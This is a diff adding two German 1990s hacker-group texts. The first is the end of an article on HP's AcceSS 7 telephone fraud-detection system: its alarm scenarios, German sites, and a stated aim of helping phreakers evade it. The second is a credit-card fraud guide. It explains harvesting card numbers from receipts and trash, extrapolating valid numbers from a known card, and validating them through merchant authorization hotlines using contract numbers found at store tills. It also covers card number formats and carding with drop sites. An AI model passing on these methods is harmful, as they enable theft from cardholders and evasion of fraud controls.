+   weitere System, das bekannteste ist Mavin/Davon von Bellcore, aber
+   keines ist so erfolgreich wie das AcceSS 7.
+   Am Anfang war es nur fuer Fehler- und Leistungsanalysen gedacht, aber
+   die Entwickler sahen die zukunfsweisenden Moeglichkeiten ihres flexiblen
+   Systems und erweiterten es.
+
+   HPs erster grosser Erfolg war im Oktober '95, als die Deutsche Telekom
+   (damals noch nicht AG :) bekannt gab, als erste europaeischer
+   Telekommunikationsbetreiber dieses System zu installieren.
+   Spaeter installierten z.B. auch Neuseeland, Finnland (Finnet Januar '96),
+   Israel (Bezeq Mai '96), Bell USA (Juni '96) das AcceSS 7.
+
+   Im Mai '95  10 der 30 groessten Telekommunikationsanbieter der Welt, heute
+   (Anfang '97) ueber 20 dieser 30 haben AcceSS 7 installiert.
+   Auch British Telecom, TeleWest, GTE und AT&T Wireless benutzen teile des
+   AcceSS 7 Systems.
+   Der Geschaeftsleiter von HP sagte dazu in einem Interview :
+     "Wir schaetzen, dass ueber 90% der CCiTT #7 Verbindungen die
+      ueberwacht werden, durch unser System ueberwacht werden."
+
+   Im Juni '96 kuendigte Hewlett Packard ein neues Toolkit an : das
+   "Fraud Management Toolkit" um Telekommunikationsbetrug zu entdecken..
+   Es wurde erstamls bei den Olympischen Spielen in Atlanta von BellSouth
+   getestet - mit hervorragendem Erfolg.
+   HP gruendete ausserdem die "Alliance to Outfox Phone Fraud" wo mehr
+   als 12 grosse Telekommunikationsanbieter zusammen Strategien entwickeln
+   um Telekommunikationsbetrug zu bekaempfen.
+
+   Der Erfolg von AcceSS 7 liegt in dem flexiblen und ausbaufaehigem Design,
+   das sich nicht nur leicht in jedes bestehende CCiTT #7 System integrieren
+   laesst, sondern ausserdem auch leicht an Kundenbeduerfnisse angepasst
+   werden kann. Ausserdem garantiert HP, dass die Installationszeit 3 Monate
+   nicht ueberschreitet, was fuer die grossen Anbieter sehr wichtig ist.
+
+
+ þ Die Hardware :
+
+   HP's Grundpaket sind 4  8-weg symmetrische multiprozessing (SMP)
+   HP 9000 Model T500 Corporate Business Servers fuer einen C7 Link.
+   Jede dieser Maschienen kann bis zu 800 Anrufe auf einmal analysieren.
+   Im August '96 war eine Ms-Dos basierter Client angekuendigt, ob dieser
+   inzwischen ausgeliefert wurde ist mir nicht bekannt.
+
+
+ þ Die Software :
+
+   Die Server benutzen als Betriebssystem HP-UX, das normale unix OS, das
+   HP auf seinen Rechnern benutzt; es ist basiert auf Sys V 4.0 von AT&T.
+   Die Clients laufen auch auf HP-UX unter HPs OpenView X-Window System.
+   Alles ist in C programmiert, die libraries, mit denen man eigene
+   Software programmieren kann fuer AcceSS 7 ist mit installiert.
+   Der Kunde (Telekom) kann eigene Applets und Skripts schreiben um
+   speziellen Aufgaben erfuellen zu koennen.
+
+   Die Basis der Software ist das Daten-Sammel-Kit, das sogenannte
+   "call detail record" (CDR) fuer jeden Anruf erstellt.
+   Diese Detaillierten-Anruf-Datensaetze koennen von Applets analysiert
+   und in jeder gewuenschten Art & Weise verwendet werden.
+   HP bietet fertige Applet-Toolkits fuer Abrechnung, Abrechnungskontrolle,
+   Verkehrskontrolle und Betrugsidentifikation.
+
+   Selbstverstaendlich ist das Betrugsidentifikations-Kit nicht die Hauptsache
+   von CCiTT #7 Ueberwachung. Urspruenglich standen Fehler- und Leistungs-
+   analysen im Vordergrund, aber dann bemerkten die Entwickler, das man mit den
+   Daten so ziemlich alles machen konnte.
+   In der heutigen Zeit spielt es eine grosse Rolle fuer die Planung von
+   Telekommunikationsinfrastrukturen, Optimierung, Fehlerkontrolle und
+   Marktanalysen - aber die Entdeckung von Missbrauch ist ein wichtiger Punkt.
+   Deshalb hier ein paar Informationen, wie das System arbeitet :
+
+
+ þ Das Betrugs-Identifikations-Toolkit :
+
+   Das Automatische Betrugs-Identifikations-Toolkit basiert auf "pattern
+   matching", d.h. ein Szenario/Verhaltensmuster wird aufgestellt wie ein
+   Betrugsfall normal aussieht und in das Toolkit eingespeisst. Wenn eine
+   Situation diesem Szenario entspricht ("the patterns match") dann wird
+   Alarm ausgeloest.
+
+   Jedes Szenario muss zuerst auf jeden Kommunikationsnetzwerk eingestellt
+   werden, da z.B. in einem Gewerbegebiet eine hoehere Anzahl von Anrufen
+   ins Ausland gehen als in einer Wohngegend.
+
+   D.h. solche Szenarien koennen erst erstellt werden, nachdem ein neuer
+   Typ von Betrug gefunden wurde.
+   Alles was in ein Betrugsszenario passt und was weit von dem normalen
+   Verhalten des Kommunikationslinks abweicht, loest einen Alarm aus.
+
+   Betrugs-Szenarien sind :
+      Anrufe sehr langer Dauer
+      Wiederholte Anrufe zu einer bestimmten Nummer aus einer Gegend
+      Wiederholte Anrufe von einer Gegend zu unterschiedlichen Nummern
+      Lange/viele Anrufe von einer Nummer die nicht zahlt
+      Das Anwaehlen bestimmter definierter Rufnummern
+      Das Anwaehlen vieler gebuehrenfreier Rufnummern
+
+   Sowie spezialisierte Szenarien :
+      Anrufe zu Nummern die besonders oft missbraucht werden
+      Verdaechtige Anwendung von "Anruf-Weiterschaltung"
+      viele Anrufe insbes. Auslands-, von einem Anschluss
+      viele Anrufe innerhalb kurzer Zeit von oeffentlichen Telefonen
+
+   Ein ausgeloester Alarm bekommt eine Prioritaetsstufe und wird auf dem
+   Bildschirm eines Operators angezeigt. Je laenger ein Alarm in einem
+   Szenario bleibt, desto hoeher wird mit der Zeit die Prioritaet.
+   Der Operator kann dann Aktionen einleiten wie Anschlussrueckverfolgung,
+   Unterbrechen der Verbindung, Sperren des Anschlusses und mehr.
+
+   Integriert ist auch eine sogeannte "Blacklist", d.h. eine Liste von
+   bekannten Kunden/Firmen die faelschlicherweise in ein solches Szenario
+   geraten.
+
+
+ XXXXXXXXXXXXXXXX
+ XXXXXXXXXXXXXXXX \
+ XXXXXXXXXXXXXXXX  \
+ XXXXXXXXXXXXXXXX   \  Out-of-   -->  XXXXXXXX \   Weitergehende    -->   XX
+ XXXXXXXXXXXXXXXX    - Pattern/  -->  XXXXXXXX  -  Out-of-Pattern/  -->   XX
+ XXXXXXXXXXXXXXXX   /  Scenario       XXXXXXXX /   Szenario
+ XXXXXXXXXXXXXXXX  /                               oder manuelle
+ XXXXXXXXXXXXXXXX /                                Pruefung (Operator)
+ XXXXXXXXXXXXXXXX
+
+    Eingehende       Ueberwachungs-   Alarm des     Weitergehende       BETRUGS-
+   Anrufe in das       system-        Ueberwach-   Out-of-Pattern/      FAELLE
+ Ueberwachungssystem   analyse        unssystems   Scenario oder
+                                                  manuelle Uberpruefung
+
+
+
+
+  þ Wo sind die deutschen HP AcceSS 7 Systeme
+
+  Deutsche Telekom AG :
+             Frankfurt, Duesseldorf, Stuttgart und Nuernberg
+             Control Centers in Frankfurt und Bamberg.
+
+  Wie es scheint, sind sie in das interne TCP/IP Netzwerk der Telekom
+  angegliedert (HITNET), die nur ueber eine Firewall an dem Internet
+  angeschlossen sind.
+
+
+
+
+
+                              LETZTE WORTE
+                             --------------
+
+ Ein kleiner Teil der Informationen in diesem Artikel war schon im
+ THC Magazine #1 (Februar '96) zu lesen. Ich aktualisierte danach die
+ Informationen, fuegte vieles ein und der Artikel erreichte die doppelte
+ Groesse :) ... Er erschien dann im Time For a Change #4, dem amerikanischen
+ Magazin von einem Kumpel, Ghost in the Machine. Fuer das 4. THC Magazine
+ habe ich ihn uebersetzt, leicht aktualisiert und gekuerzt was nicht fuer
+ Deutsche interessant ist, damit er mehr Leute ihn lesen und insbesondere
+ Phreaker auf die Gefahr aufmerksam werden und sich ueberlegen wie sie das
+ System ueberlisten koennen.
+
+ Das System *ist* aktiv, wie z.B. gerade ein Fall von vor 2 Wochen zeigt :
+ Ein Freund hatte 0130-Scanning betrieben, so ca. 6 Stunden ueber Nacht laufen
+ lassen, und als er ihn am morgen beendete bekam er nach kurzer Zeit einen
+ Anruf, dass auffaellig oft von seiner Leitung aus gewaehlt wurde, der
+ Anschluss sofort gesperrt und erst wieder freigeschaltet wird, nachdem er
+ von einem Telekomtechniker vor Ort inspiziert wird.
+
+ Wer also in einer laendlichen Region wohnt hat hiermit echt Probleme, wer
+ allerdings direkt in einer Grossstadt wohnt, idealerweise vielleicht noch
+ angeschlossen an einer VST an dem auch viele Betriebe angeschlossen sind,
+ hat da mehr Glueck.
+
+ Wer sich den Artikel aufmerksam durchgelesen hat wird merken, dass zugleich
+ viel wie wenig drinnen steht. Es ist alles, was ich aus sensitiven Daten
+ wie oeffentlichen Pressesachen herausfiltern konnte. Vieles ist zusammen-
+ gereimt manches vielleicht auch falsch, aber ungefaehr so arbeitet das System.
+ Da ich nicht weiss ob folgende 2 Dinge mit dem AcceSS 7 zu tun haben, habe
+ ich sie hier reingeschrieben :
+ Es ist technisch ohne Probleme moeglich herauszufinden, auch mit AcceSS 7,
+ ob ein Anruf automatisch gemacht wurde (Fax/Modem/Schnellwahltaste/etc.)
+ oder per Hand gewaehlt wurde. Ob das irgendwie ausgewertet wird weiss ich
+ nicht, wird aber schon seit laengerem bei guten PBXen gemacht.
+ Desweiteren benutzt die Telekom eine Software namens MOSES an ihren Vermitt-
+ lungsstellen, was auch eine Ueberwachung macht. Ob sie in irgendeinem
+ Zusammenhang mit AcceSS 7 steht oder was genau sie macht ist mir leider
+ (noch) nicht bekannt.
+
+ Wer noch irgendwelche Infos hat, einfach eine email senden an vh@campus.de
+ und mit dem PGP key unten verschluesseln. Wer Informationen dieser Art
+ zurueckhaelt schadet anderen nur, hat selbst aber keinerlei Vorteile, da
+ es ja nix ist, was stirbt, wie eine C5 Nummer oder eine PBX ...
+
+
+ Passt auf euch auf ...
+
+                     van Hauser / THC (vh@campus.de)
+
+
+Type Bits/KeyID    Date       User ID
+pub  1024/3B188C7D 1995/10/10 van Hauser/THC of LORE BBS
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.3i
+
+mQCNAzB6PNQAAAEEALx5p2jI/2rNF9tYandxctI6jP+ZJUcGPTs7QTFtF2c+zK9H
+ElFfvsC0QkaaUJjyTq7TyII18Na1IuGj2duIHTtG1DTDOnbnZzIRsXndfjCIz5p+
+Dt6UYhotbJhCQKkxuIT5F8EZpLTAL88WqaMZJ155uvSTb9uk58pv3AI7GIx9AAUT
+tBp2YW4gSGF1c2VyL1RIQyBvZiBMT1JFIEJCU4kAlQMFEDJ2gzNAf3b9d/IP1QEB
+5DwD+gJRh6m4h0fVgpQJkOiuQD68lV5w8C0F5R3jk/o6Pollaf7gtVhG8BGGo5/7
+/yiH40gujc82rJdmihwcKuZQtwt8X28VN8uy56SCpXD5wjjOZpq0t0qSXmhgunZ0
+m7xv7R4mWRzFclsgQCMwXNgp4sXgw64bVm8FhEdkrVSO8iTyiQCVAwUQMkMhCspv
+3AI7GIx9AQFstAP+Jrg7V06FGV/sTzegFNoaSyOItkvXjctzFsXuBfta2M7EzPX3
+UR3kM4/W4xE70H4XmMOJ9RmTzs+MuhSq8BtGQtYaJqGjxe/ldbvGOXRxR1rBJAKS
+yDQYu0VJ/Ae8yuJcMS312jqwg8OLgYnQaqEoaRM4HEiB+hgDRqnFKpDxkhSJAJUD
+BRAyQx8E5y7IvlL6xvEBAQ+bA/9baK7f3M9F5n4aASy04WHOreUNpGQ8DXgtMVq7
+KVdXMIWjURsboR+wt5eJTPeL00lHS5eqmZlNzGV9hWtzAr20qrKLmvE20Ke4VPB0
+a/tWXNUdvLnk4ENbTBFfMMdnlDo3hSThSMQ7yZ9UEYgighKu6l2fG5UG6D+kXFLy
+iIvvlA==
+=nX2w
+-----END PGP PUBLIC KEY BLOCK-----
+
+

Papers/card-ger.txt

@@ -0,0 +1,446 @@
+    % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % %
+    %                                                                       %
+    %                             KREDiTKARTEN                              %
+    %                                                                       %
+    %                   GEHASST, VERDAMMT, VERGOETTERT ?!                   %
+    %                                                                       %
+    %           GEFAHREN, BETRUG, ANTi-FRAUD SYSTEME, VORURTEiLE            %
+    %                                                                       %
+    % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % % %
+
+
+    Hinweis : Kreditkartenbetrug ist eine strafbare Handlung, die Absicht
+              dieses Textes ist auf gar keinen Fall, den Leser zu unerlaubten
+              Handlungen aufzufordern. Der Text dient rein zum Zwecke der
+              Information.
+
+    Warnung : Der hier vorliegende Text ist urheberrechtlich geschuetzt.
+              Jeglicher Nachdruck (auch auszugsweise) ist nur mit
+              schriftlicher Genehmigung des Autors bzw. [THC]
+              und Quellenangabe gestattet.
+
+    Autor   : GemFire / [THC] The Hacker's Choice
+
+
+Dieser Text soll etwas anders werden, also die anderen tausend Texte, die
+bereits geschrieben wurden, manch einer findet ihn vielleicht nicht so
+informativ wie andere, aber das ist sowieso nicht der Punkt, das wird keine
+Anleitung, um eine Straftat zu begehen. Das sind meine Erfahrungen und meine
+Meinungen zu gewissen Themen, wer etwas besser weiss oder einen Kommentar
+dazu hat, kann mich das in neutraler Form wissen lassen, wer denkt er ist
+was Besseres, behaelt alles besser fuer sich.
+
+NOCH EIN WORT AN UNSERE FREUNDE UND HELFER VOM STAAT:
+Bloss weil ich ueber etwas schreibe heisst das noch lange nicht, dass ich es
+auch mache, also waere ich Euch sehr verbunden wenn Ihr es unterlassen wuerdet,
+mich zu belaestigen... Geilt es Euch auf mein Telefon abzuhoeren? Nur zu, mit
+meiner Freundin telefoniere ich meist abends. Wuehlt Ihr gerne in fremden
+Wohnungen rum? Bei mir gibt es nichts zu finden, Ihr koennt also gerne etwas
+rumstoebern, aber lasst bitte meine Kleidung nicht wieder rumliegen und raeumt
+nachher alles auf. Und wenn Euch CDs oder Buecher oder 2600er Magazine
+interessieren, dann kauft sie Euch selbst und beschlagnahmt es nicht gleich
+und lasst es dann verschwinden, ich hoffe wir verstehen uns. In diesem Sinne,
+viel Spass beim Lesen, vielleicht lernt ihr ja auch was.
+
+Viele interessiert wohl, wie kommt man an Kreditkartendaten ueberhaupt ran?
+Wer gibt einem schon seine Karte? Wozu gibt es Datenschutz? Wuerde sonst nicht
+jeder damit Unfug treiben? Nun, die Moeglichkeiten sind hier so zahlreich, sie
+reichen von einfachen Methoden, die jeder Vollidiot machen kann und eigentlich
+auch selbst draufkommen muesste bis zu besseren und komplizierteren Methoden.
+Zunaechst einmal gibt es "Trashing" eine uralte Methode, die aber immer noch
+sehr erfolgreich angewendet werden kann. Waere mir persoenlich zu anstrengend
+und zu dreckig, aber manche Leute werden sicher nicht abgeneigt sein, wenn es
+zum Erfolg fuehrt... Muelleimer an Tankstellen, kleinen Geschaeften, bei Banken
+und in Banken, man muss einfach mal selbst nachdenken, was es in seiner Gegend
+gibt und wo evtl. Kreditkartentransaktionen vorgenommen werden. Man kann auch
+in grosse Kaufhaeuser gehen und versuchen an nicht besetzten Kassen die
+Kreditkarten Quittungen zu finden. Oder koennt Ihr euch gut Zahlen merken?
+Einfach an der Kasse wenn jemand mit KK zahlt Nummer merken. Das fuehrt
+natuerlich nicht zum Erfolg wenn Ihr mit dieser Absicht losgeht ;) Man sollte
+einfach immer einen Block dabeihaben, Nummer merken und danach gleich notieren
+oder ein kleines Voice-Memo mit 20 Sek. Aufnahmezeit, alles praktisch um
+einfach, bei Gelegenheit an neue Karten ranzukommen. Nun, werden manche
+einwerfen, es gibt ja noch KK Generatoren, wie z.B. auch mein THC-CREDiT,
+nun ein sehr gutes Werkzeug, wenn man Bescheid weiss, ansonsten ist man meist
+auf dem Holzweg... Um gleich mal mit einem Vorurteil aufzuraeumen - die
+generierten Nummern sind natuerlich nicht alle gueltig, sondern berechnet.
+Wenn alle berechneten Nummer gueltig waeren, dann gibt es keine neuen Nummern
+mehr, um sie an neue Kunden auszugeben... Allerdings erhoehen diese Programme
+die Chancen eine gueltige Nummer zu finden und wenn man es richtig anstellt,
+kann jede zweite eine gueltige sein. Die Karten einfach mit normaler Methode
+zu berechnen ist besser als sich einfach eine Zahl auszudenken, aber wesentlich
+effektiver ist da die "Extrapolate" Funktion. Das bedeuted man besitzt eine
+gueltige Kartennummer (kann sogar die eigene sein) und berechnet aus dieser
+Karte andere, indem man die letzten 4 Ziffern veraendert. Das hat etwas mit dem
+Aufbau der Karte zu tun. Zumindest bei Eurocard/Mastercard und Visa ist das
+System das selbe und fuer diese beiden haeufigsten Karten erklaere ich das
+jetzt auch.
+
+z.B. eine Visa Karte 4000 0000 0000 0002
+
+                     4000 = Ist die Bank ID, grosse Banken haben eine eigene
+                            kleinere teilen sich eine mit anderen bzw. fuer
+                            deutsche Eurokarten gibt es nur eine, naemlich
+                            die 5232
+
+                          0000 0000 = Dieses Feld identifiziert eine Gruppe
+                                      von Kartenbesitzern, z.B. mit aehnlichem
+                                      oder gleichen Verfallsdatum und Kredit-
+                                      rahmen, allerdings ist diese Nummer
+                                      nur zugeordnet, dass heisst man kann
+                                      keine Rueckschluesse auf diese Daten
+                                      ziehen.
+
+                                    0002 = Dieses Feld wird nun einzelnen
+                                           Kartenbesitzern aus dieser Gruppe
+                                           zugeordnet.
+
+Wenn man eine Karte extrapoliert hat man also den Vorteil, das Bank ID und
+Gruppe auch zu 100% existieren, und bekannte Kombinationen sind voll mit
+gueltigen Nummern... Man berechnet eben moegliche letzte Ziffern der einzelnen
+Kartenbesitzer. Um die Methode auch effektiv zu nutzen und zu grossen Mengen
+an KK# zu kommen, sollte man moeglichst zusaetzlich ueber eine Online Pruef-
+moeglichkeit verfuegen, dies gehoert zu den zuvor genannten komplizierteren
+Methoden an Karten zu kommen. Ich erklaere nur eine, da die anderen wohl
+sowieso niemand ausfuehren kann, der sich nicht auch tiefer mit anderen Themen
+beschaeftigt, z.B. wie man bestimmte amerikanische Telefonnummer anrufen kann
+oder sich Zugang zu fremden Netzen und Computern verschaffen kann oder VMB
+Systeme durchforsten kann. Das ist auch sicher nicht meine Aufgabe diese
+Sicherheitsluecken zu schliessen, indem man alle Welt darauf aufmerksam macht
+und Tausende von Neulingen darauf loslaesst.
+Nun werde ich aber zumindest mal als Beispiel eine Moeglichkeit erklaeren.
+Beispielsweise ein Versand oder auch Kaufhaeuser bei denen das Terminal mal
+nicht funktioniert muessen ja eine Moeglichkeit haben KK zu ueberpruefen.
+Der Versand ist ja sowieso nicht im Besitz der Plastikkarte sondern hat nur
+die Nummer, das Verfallsdatum und den Namen etc. Aber er will natuerlich auch
+sein Geld, also fuellt er ein Formular aus und benoetigt dann sozusagen
+als Bestaetigung auch eine Genehmigungsnummer die er eintragen kann, mit
+der dann eben diese Transaktion abgehandelt wird, also ruft er bei der
+Kreditfirma, bei der er einen Vertrag hat an und ueberprueft die Kartennummer.
+
+Die kann z.B. so ablaufen:
+
+[VERSAND WAEHLT NUMMER 069 XXXXXXXX]
+
+EUROCARD : "Eurocard Genehmigungsdienst, wie kann ich Ihnen helfen?"
+VERSAND  : "Ich benoetige eine Genehmigunsnummer, meine Vertragsnummer lautet
+            15X XXX XXX, die Kartennummer ist 5XXX XXXX XXXX XXXX, gueltig
+            bis 12/98"
+EUROCARD : "Mit welchem Betrag wird die Karte belastet?"
+VERSAND  : "120 DM"
+EUROCARD : "Einen Moment bitte... alles in Ordnung, die Genehmigungsnummer
+            lautet 057638"
+VERSAND  : "Danke, auf Wiederhoeren!"
+
+Gibt es keine Genehmigungsnummer, dann ist die Karte entweder ungueltig,
+gestohlen oder ueberzogen bzw. hat kein ausreichendes Kreditlimit. Der Betrag
+wird virtuell vom Kartenkonto abgezogen (hat den Sinn, dass wenn jemand ein
+Limit von 1000 Mark hat und z.B. im 5 Minuten Abstand andauernd fuer 1000 DM
+Sachen bestellt, dass ihm da ein Strich durch die Rechnung gezogen wird.)
+Wie gsagt, es wird also virtuell schonmal abgezogen, geht dann das Formular
+mit Genehmigungsnummer usw. nicht innerhalb einer bestimmten Zeit ein, wird es
+als Fehler abgetan und der Betrag wird wieder zurueckgebucht. Nun, ich hoere
+schon wieder die Fragen... Wo bekommt man die Telefonnummer? Wo bekomm ich
+die Vertragsnummer? Das ist wirklich einfach, im Kaufhaus steht fuer den Fall
+eines Terminalausfalls oder fuer moegliche Rueckfragen bei der KK Gesellschaft
+immer eine Tel. Nummer und die Vertragsnummer meistens auf einem Aufkleber am
+Telefon oder daneben oder an der Rueckwand des Kassenhaeuschens, schaut einfach
+mal, ich bin mir sicher ihr habt gleich beim ersten mal Erfolg, wenn ihr in
+ein Kaufhaus geht. Nun, da fragen einige gleich wieder, wenn man die Karte
+extrapoliert hat, dann hat man ja kein Gueltigkeitsdatum, nun das ist auch
+nicht noetig, das ist nur der Form wegen, es geht jedes Datum > heutiger Tag.
+Das Datum wechselt ja eh oefters, wenn eine neue Karten ausgegeben wird und
+ausserdem sind das Unmengen von Daten auf die zugegriffen werden muss, bei
+diese Ueberpruefungen sind eben nur die Nummern wichtig, die Datensaetze mit
+Namen und anderen Sachen, waeren unvorstellbar gross. So ist das auch in den
+meisten Faellen wo KK verlangt werden z.B. im Internet. Allerdings gibt es
+gerade im Internet einige bei denen das Gueltigkeitsdatum (Expiration Date)
+mitgeprueft wird, das ist eine Auflage der KK Firmen... In diesem Fall hat
+man entweder eine Karte mit Datum zur Hand, die man z.B. auf einer Quittung
+im Muell gefunden hat oder man nimmt bei "Extrapolate" das selbe Datum, wie
+das der Karte aus der man extrapoliert hat, z.B. eben man extrapoliert von
+seiner eigenen Karte und nimmt dann auch das gleiche Gueltigkeitsdatum, was
+meistens auch funktioniert. Nun moechte ich mal generell noch etwas zum Auf-
+bau der Karten und ihrer Formate sagen.
+
+Diese Formate sind ab Version 1.9 auch in THC-CREDiT vollstaendig
+integriert. Im Moment sind Bedingungen wie die zweite Ziffer von Eurocard
+noch nicht integiert, da sie mir auch erst seit kurzem in der Form bekannt
+sind. Das bedeutet noch hoehere Trefferquoten bei THC-CREDiT, da andere
+Programme meistens nur die 1. Ziffer beachten.
+
+EUROCARD /  MASTERCARD / ACCESS CARD
+
+5AXX XXXX XXXX XXXX
+
+A = Ziffer zwischen 1 und 5 (einschliesslich)
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- Immer 16 Stellen
+- 1. Ziffer immer eine 5
+- 2. Ziffer zwischen 1 und 5 (einschliesslich)
+
+
+ViSA CARD
+
+4XXX XXXX XXXX XXXX oder 4XXX XXX XXX XXX
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- 16 Stellen oder bei aelteren Karten 13 Stellen (gibt es kaum mehr)
+- 1. Ziffer immer eine 4
+
+
+AMERiCAN EXPRESS
+
+3AXX XXXXXXX 100X oder 3AXX XXXXXXX 101X
+
+A = 4 or 7
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- Immer 15 Stellen
+- 1. Ziffer immer eine 3
+- 2. Ziffer entweder 4 oder 7
+- Ziffern 12, 13 und 14 entweder 100 oder 101
+
+
+DiNERS CLUB / CARTE BLANCHE
+
+3AXX XXXXXX XXXX
+
+A = 0, 6, or 8
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- Immer 14 Stellen
+- 1. Ziffer immer eine 3
+- 2. Ziffer entweder 0, 6 oder 8
+
+
+DiSCOVER CARD
+
+6011 XXXX XXXX XXXX
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- Immer 16 Stellen
+- Ersten 4 Ziffern immer 6011
+
+JCB CARD
+
+AAAA XXXX XXXX XXXX
+
+AAAA = 3088, 3096, 3112, 3158, 3337 oder 3528
+
+Bedingungen in Kuerze:
+
+- Gueltig nach MOD-10 Algorithmus (wie ihn z.B. THC-CREDiT benuetzt)
+- Immer 16 Stellen
+- Ersten 4 Ziffern nur aus dem oben genannten Nummernpool
+
+Wie Kreditkartenbetrug funktioniert moechte ich hier nur kurz anreissen,
+es gibt ja wirklich genug (mehr oder weniger sinnvolle) Texte zu diesem
+Thema, generell unterscheiden wir hier das Classic Carding, bei dem bei
+einem Versand mit KK bestellt wird und das ganze an eine Dropsite geliefert
+wird, z.B. ein verlassenen Haus oder ein Haus dessen Besitzer im Urlaub sind.
+Der schwierige Teil ist es hier, sein Paket an der Dropsite zu bekommen, was
+aber bei etwas Einfallsreichtum kein Problem sein sollte. Dann haben wir
+seit laengerem nun auch das Bezahlen mit KK im Internet, da wisst ihr wohl
+selbst was man machen kann, obwohl ich es bis heute nicht verstehen kann,
+warum ein Vollidiot KK# im Internet hernimmt um Pornobildchen zu ziehen, aber
+naja jeder so (dumm) wie er will. Dann gibt es das Carding fuer den Profi
+mit Plastikkarten und allem drum und dran, ueber das wie moechte ich hier
+kein weiteres Wort verlieren... Was man damit anfangen kann ist klar, ueber
+all wo Karten genommen werden kann man auch damit zahlen, auch an evtl.
+Automaten (aber keine Bankautomaten - hier wird wie bei jeder Bankkarte auch
+eine PiN verlangt). Automaten koennen z.B. fuer Zugtickets usw. bereitstehen,
+auch hier moechte ich keine naeheren Anregungen geben, findet selber raus was
+geht und wo man Karten reinstecken kann, ist wohl auch nicht so schwer.
+Dann gibt es noch einige spezielle Anwendungsmoeglichkeiten wie z.B. sich
+ueber AT&T oder aehnlichen Telefongesellschaften ueber ihre 0130 Nummer
+weiterverbinden laesst und per KK zahlt. (in Deutschland allerdings NICHT mehr
+in der Form moeglich!) Generell geht alles wo man mit KK zahlen kann. Wie
+gesagt, hier soll niemand zu Straftaten angeregt werden, deshalb wurde das nur
+kurz angesprochen. Ist das ganze gefaehrlich? JAAAAAAAA also lasst die Finger
+davon! Vor allem wenn Ihr blutige Anfaenger seit, aber druecken wir es so aus
+fuer Leute die Bescheid wissen, besteht (fast) keine Gefahr, wenn sie gewisse
+Regeln beachten. Nun warum tun die KK Firmen nichts gegen Missbrauch?
+Generell sind die KK Firmen an Stillschweigen interessiert, Missbrauch zahlt
+die Versicherung ohne Murren und es wird kein grosser Aufstand gemacht.
+Manchmal, wenn irgendein Drecks-Boulevard-Magazin das Thema KK Betrug mal
+aufgreift, dann jammern sie ueber ihre Verluste... mit einem anderen Atemzug
+heisst es "Die Verluste sind Kleinigkeiten im Verhaeltnis zu Massnahmen gegen
+Missbrauch". Verstaendlich, sie muessten das gesamte System aendern... Kleinere
+Gegenmassnahmen sind oft nur ein Werbegag. Um nur mal ein Beispiel zu nennen,
+die Visa FOTOCARD bringt zwar vielleicht was wenn der Besitzer seine Karte
+verliert. Obwohl, Tests beweisen, auf dem Foto kann ein Japaner drauf sein und
+niemand fraegt einen Deutschen was er mit der Karte macht, also Nutzen gleich
+Null. Ausserdem, ein Kreditkartenbetrueger kann ja a) die Kartenummer benutzen
+beim Versand im Internet usw. und b) Wenn er Missbrauch mit einer echten Karte
+betreibt und damit einkaufen geht, ist da nicht zwangslaeufig ein Foto drauf,
+sehr wohl jedoch die richtigen Daten des Besitzers...
+Ueber ein neues Anti-Missbrauchs-System wollen wir doch mal kurz reden.
+FALCON - Ein toller Name...
+An dieser Stelle ein Dank an Walker/THC fuer das Zusammentragen und Schreiben
+von Informationen zu diesem Thema... Es gibt von ihm auch ein extra Textpaket
+zu dem Thema FALCON, also versucht es zu bekommen, wenn Ihr Euch fuer alle
+Einzelheiten interessiert.
+Nun FALCON gibt es seit Januar 1995, es analysiert und speichert die
+Transaktionen eines Kartenbesitzers. Es erstellt ein Benutzerprofil und
+erkennt verdaechtige Transaktionen, was zur Folge hat, das man sich z.B. an
+der Kasse ausweisen muss wenn das System Alarm schlaegt. Das ganze klingt
+in der Theorie hervorragend. Man sollte sich nur Fragen:
+
+WARUM ZU HOELLE ERSTELLEN DIE SAECKE EIN BENUTZERPROFIL UEBER MICH ?
+
+Nun, das ist auch ein grosser Grund fuer mich KEINE Kreditkarte anzuschaffen.
+Wer weiss, was mit meinen Daten passiert? Man geht in den Sexshop, kauft eine
+Peitsche ;) und am naechsten Tag ist der Briefkasten voll mit Domina Magazinen
+und Werbung ?! Kundenspezifische Werbung! Nein danke... und die KK Firmen
+kassieren noch mehr Geld?! Wahrscheinlich ist das der einzige Sinn von FALCON,
+nicht den Missbrauch zu verhindern sondern nur die Verluste durch neue Geld-
+quellen auszubuegeln... Das ist natuerlich nur Spekulation und ich moechte
+die KK Firmen nicht verdaechtigen, dass sie alle geldgeile Vollidioten sind,
+nichts liegt mir ferner. Nur eins: Von der Wirksamkeit von FALCON konnte man
+bisher nicht viel bemerken. Wieder mal sollen wohl hauptsaechlich die Kunden
+beruhigt werden.
+
+Nun, bekam ich am 20. Februar diesen Jahres eine E-Mail, dass das nieder-
+laendische Fernsehen eine Reportage ueber Kreditkartenmissbrauch machen will.
+Dazu wollten sie mich interviewen, weil sie ja auch mein Programm haben.
+Nun, generell bin ich gegen diesen Pressedreck. Wenn ein gewisser K.S. wieder
+durch RTL und PRO7 Sendungen geistern und Muell ablaesst und kleine Tricks
+vorfuehrt wie ein Zauberer auf dem Kindergeburtstag, aber nun hatten sie ja
+sowieso mein Programm und ich wollte etwas gegen Vorurteile wirken, indem
+ich ihnen einfach auf ihre Fragen antworte, denn die Presse arbeitet ja
+frei nach dem Motto: Was ich nicht weiss - erfinde ich einfach. So, nunja
+zwar hatten sie etwas Schwierigkeiten zu begreifen, dass mein Name GemFire
+und nicht SysGod ist, aber naja, wie sie ueberhaupt drauf gekommen sind?
+Nun in einer Board Werbung von mir stand unter der Telefonnummer meines H/P
+Board "Sysgod: GemFire" was ja eigentlich nichts anderes bedeutet, als dass
+der Systemoperator GemFire heisst, aber naja, obwohl ich es ihnen klar gemacht
+hab, haben sie dann irgendwie beide Namen genannt in ihrer Reportage...
